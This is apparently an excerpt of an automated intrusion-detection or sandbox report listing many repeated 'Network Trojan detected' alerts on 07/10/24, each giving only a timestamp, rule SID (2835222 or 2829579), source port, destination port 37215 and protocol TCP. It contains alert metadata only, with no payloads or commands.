                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:02.997296
                  SID:2835222
                  Source Port:35012
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:16.994727
                  SID:2835222
                  Source Port:51972
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:23.875941
                  SID:2835222
                  Source Port:48292
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:20.450193
                  SID:2829579
                  Source Port:60730
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:28.682326
                  SID:2835222
                  Source Port:53358
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:27.103882
                  SID:2829579
                  Source Port:40894
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:23.337851
                  SID:2835222
                  Source Port:35618
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:22.773941
                  SID:2829579
                  Source Port:58600
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:33.839511
                  SID:2835222
                  Source Port:55814
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:41.536337
                  SID:2835222
                  Source Port:51724
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:59.880494
                  SID:2829579
                  Source Port:47480
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:30.522162
                  SID:2829579
                  Source Port:41346
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:13.828221
                  SID:2829579
                  Source Port:34292
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:23.491669
                  SID:2829579
                  Source Port:46020
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:08.383825
                  SID:2835222
                  Source Port:57576
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:13.753086
                  SID:2829579
                  Source Port:50808
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:17.961786
                  SID:2835222
                  Source Port:53836
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:25.469526
                  SID:2835222
                  Source Port:57430
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:17.990229
                  SID:2835222
                  Source Port:43204
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:38.658229
                  SID:2829579
                  Source Port:35100
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:08.392064
                  SID:2829579
                  Source Port:59586
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:28.130365
                  SID:2835222
                  Source Port:38848
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:14.807023
                  SID:2829579
                  Source Port:36114
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:29.858184
                  SID:2829579
                  Source Port:38808
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:42.381033
                  SID:2835222
                  Source Port:35278
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:45.615423
                  SID:2829579
                  Source Port:52660
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:33.854802
                  SID:2829579
                  Source Port:53730
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:41.395055
                  SID:2829579
                  Source Port:39670
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:55.449293
                  SID:2829579
                  Source Port:44236
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:23.309785
                  SID:2829579
                  Source Port:52924
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:29.842120
                  SID:2835222
                  Source Port:33348
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:42.399244
                  SID:2835222
                  Source Port:45592
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:14.807456
                  SID:2829579
                  Source Port:56952
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:15.788826
                  SID:2829579
                  Source Port:39578
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:33.222774
                  SID:2835222
                  Source Port:35764
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:02.865689
                  SID:2835222
                  Source Port:43010
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:20.483063
                  SID:2835222
                  Source Port:33760
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:28.062110
                  SID:2835222
                  Source Port:53012
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:42.416063
                  SID:2829579
                  Source Port:33224
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:38.520024
                  SID:2829579
                  Source Port:35752
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:17.064764
                  SID:2835222
                  Source Port:39430
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:42.440336
                  SID:2835222
                  Source Port:58578
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:59.837410
                  SID:2835222
                  Source Port:39028
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:32.538525
                  SID:2835222
                  Source Port:37674
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:02.994368
                  SID:2829579
                  Source Port:43556
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:17.091554
                  SID:2835222
                  Source Port:33704
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:45.628339
                  SID:2835222
                  Source Port:34770
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:34.131322
                  SID:2835222
                  Source Port:58760
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:42.455188
                  SID:2829579
                  Source Port:50810
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:08.451424
                  SID:2829579
                  Source Port:52628
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:10.679759
                  SID:2835222
                  Source Port:53250
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:23.917692
                  SID:2829579
                  Source Port:54280
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:20.113848
                  SID:2829579
                  Source Port:52570
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:25.430208
                  SID:2829579
                  Source Port:37408
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:52.078172
                  SID:2829579
                  Source Port:35044
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:28.919298
                  SID:2829579
                  Source Port:56674
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:47.857207
                  SID:2829579
                  Source Port:60484
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:43.543257
                  SID:2835222
                  Source Port:44880
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:55.422877
                  SID:2835222
                  Source Port:60594
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:52.073471
                  SID:2835222
                  Source Port:54792
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:22.532375
                  SID:2829579
                  Source Port:40254
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:26.441172
                  SID:2829579
                  Source Port:60688
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:08.318438
                  SID:2835222
                  Source Port:45276
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:08.397659
                  SID:2829579
                  Source Port:42260
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:28.739373
                  SID:2829579
                  Source Port:33446
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:41.490874
                  SID:2835222
                  Source Port:37314
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:02.730689
                  SID:2829579
                  Source Port:34642
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:28.909178
                  SID:2835222
                  Source Port:43712
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:30.538125
                  SID:2835222
                  Source Port:55246
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:55.422877
                  SID:2835222
                  Source Port:59476
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:38.566781
                  SID:2835222
                  Source Port:53428
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:13.647852
                  SID:2835222
                  Source Port:36138
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:13.758610
                  SID:2835222
                  Source Port:49204
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:34.214709
                  SID:2829579
                  Source Port:42376
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:19.251231
                  SID:2835222
                  Source Port:49276
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:23.938620
                  SID:2835222
                  Source Port:54426
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:23.273552
                  SID:2835222
                  Source Port:34786
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:43.798286
                  SID:2835222
                  Source Port:49360
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:34.229660
                  SID:2829579
                  Source Port:57554
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:33.249183
                  SID:2829579
                  Source Port:55180
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:59.835499
                  SID:2829579
                  Source Port:34858
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:10.598272
                  SID:2829579
                  Source Port:46078
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:11.220716
                  SID:2835222
                  Source Port:51444
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:13.647460
                  SID:2835222
                  Source Port:37018
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:02.702208
                  SID:2835222
                  Source Port:53924
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:36.392323
                  SID:2835222
                  Source Port:60128
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:42.412698
                  SID:2829579
                  Source Port:47922
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:36.385173
                  SID:2835222
                  Source Port:46750
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:05.169661
                  SID:2835222
                  Source Port:51928
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:25.464984
                  SID:2835222
                  Source Port:51428
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:42.427094
                  SID:2829579
                  Source Port:40006
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:28.772141
                  SID:2835222
                  Source Port:58792
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:11.178483
                  SID:2835222
                  Source Port:49136
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:31.528141
                  SID:2835222
                  Source Port:47672
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:38.655594
                  SID:2835222
                  Source Port:41886
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:26.588414
                  SID:2829579
                  Source Port:55542
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:13.868751
                  SID:2829579
                  Source Port:48034
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:07.376641
                  SID:2829579
                  Source Port:51320
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:10.767328
                  SID:2835222
                  Source Port:46670
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:17.104843
                  SID:2829579
                  Source Port:39274
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:11.136124
                  SID:2835222
                  Source Port:34364
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:17.092016
                  SID:2835222
                  Source Port:54824
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:02.847593
                  SID:2829579
                  Source Port:55270
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:22.539034
                  SID:2829579
                  Source Port:51266
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:31.083284
                  SID:2829579
                  Source Port:47884
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:42.356515
                  SID:2835222
                  Source Port:52396
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:05.135753
                  SID:2835222
                  Source Port:51252
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:34.228514
                  SID:2829579
                  Source Port:45280
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:36.280780
                  SID:2829579
                  Source Port:39816
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:08.417840
                  SID:2835222
                  Source Port:56046
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:32.591904
                  SID:2835222
                  Source Port:46498
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:47.840921
                  SID:2835222
                  Source Port:49398
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:34.155156
                  SID:2835222
                  Source Port:48034
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:28.756462
                  SID:2829579
                  Source Port:46686
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:23.893892
                  SID:2835222
                  Source Port:41840
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:33.758146
                  SID:2829579
                  Source Port:39762
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:43.842656
                  SID:2835222
                  Source Port:49168
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:11.544699
                  SID:2829579
                  Source Port:57790
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:53.204371
                  SID:2829579
                  Source Port:48806
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:13.838798
                  SID:2835222
                  Source Port:56674
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:59.793542
                  SID:2829579
                  Source Port:60442
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:13.800580
                  SID:2829579
                  Source Port:46874
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:53.114397
                  SID:2835222
                  Source Port:47748
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:45.631888
                  SID:2835222
                  Source Port:44690
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:28.139469
                  SID:2829579
                  Source Port:50986
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:17.992846
                  SID:2835222
                  Source Port:53470
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:49.755062
                  SID:2829579
                  Source Port:34566
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:30.509826
                  SID:2835222
                  Source Port:57190
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:17.088792
                  SID:2835222
                  Source Port:40724
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:33.823408
                  SID:2829579
                  Source Port:58618
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:28.743244
                  SID:2829579
                  Source Port:38826
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:11.522836
                  SID:2835222
                  Source Port:47786
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:59.630762
                  SID:2829579
                  Source Port:44696
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:31.106544
                  SID:2829579
                  Source Port:34346
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:19.264327
                  SID:2829579
                  Source Port:54448
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:02.720199
                  SID:2835222
                  Source Port:42578
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:47.967087
                  SID:2829579
                  Source Port:58056
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:24.956941
                  SID:2829579
                  Source Port:54312
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:31.468333
                  SID:2835222
                  Source Port:51526
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:14.781541
                  SID:2835222
                  Source Port:35770
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:02.951935
                  SID:2835222
                  Source Port:33746
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:15.879518
                  SID:2835222
                  Source Port:48232
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:05.190892
                  SID:2829579
                  Source Port:43400
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:48.032433
                  SID:2829579
                  Source Port:60324
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:24.959709
                  SID:2835222
                  Source Port:45758
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:49.861410
                  SID:2829579
                  Source Port:53064
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:22.871657
                  SID:2835222
                  Source Port:56276
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:33.221493
                  SID:2835222
                  Source Port:37284
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:26.435270
                  SID:2835222
                  Source Port:33996
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:16.990207
                  SID:2829579
                  Source Port:35312
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:10.767328
                  SID:2835222
                  Source Port:41978
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:33.751241
                  SID:2835222
                  Source Port:60976
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:14.808084
                  SID:2835222
                  Source Port:54140
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:23.953433
                  SID:2835222
                  Source Port:56832
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:07.369719
                  SID:2829579
                  Source Port:37312
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:11.616592
                  SID:2835222
                  Source Port:58546
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:38.637224
                  SID:2835222
                  Source Port:35940
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:25.447222
                  SID:2829579
                  Source Port:34228
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:31.099598
                  SID:2835222
                  Source Port:58882
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:36.388728
                  SID:2835222
                  Source Port:60378
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:57.566526
                  SID:2835222
                  Source Port:59882
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:38.590272
                  SID:2829579
                  Source Port:51712
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:23.452507
                  SID:2835222
                  Source Port:58708
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:32.603772
                  SID:2829579
                  Source Port:35644
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:51.992041
                  SID:2835222
                  Source Port:33224
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:20.119674
                  SID:2829579
                  Source Port:38270
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:47.739348
                  SID:2829579
                  Source Port:54174
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:20.431094
                  SID:2829579
                  Source Port:37570
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:22.487883
                  SID:2835222
                  Source Port:50198
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:23.341408
                  SID:2835222
                  Source Port:43278
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:14.806375
                  SID:2835222
                  Source Port:45506
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:22.482500
                  SID:2835222
                  Source Port:35136
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:05.134098
                  SID:2835222
                  Source Port:52650
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:15.838887
                  SID:2829579
                  Source Port:40456
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:28.873311
                  SID:2835222
                  Source Port:40908
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:05.205582
                  SID:2829579
                  Source Port:52014
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:11.088418
                  SID:2835222
                  Source Port:48086
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:55.277913
                  SID:2829579
                  Source Port:36548
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:43.752339
                  SID:2829579
                  Source Port:40498
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:31.530342
                  SID:2835222
                  Source Port:37680
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:57.525834
                  SID:2835222
                  Source Port:49732
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:31.086358
                  SID:2835222
                  Source Port:43238
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:51.945867
                  SID:2829579
                  Source Port:48694
                  Destination Port:37215
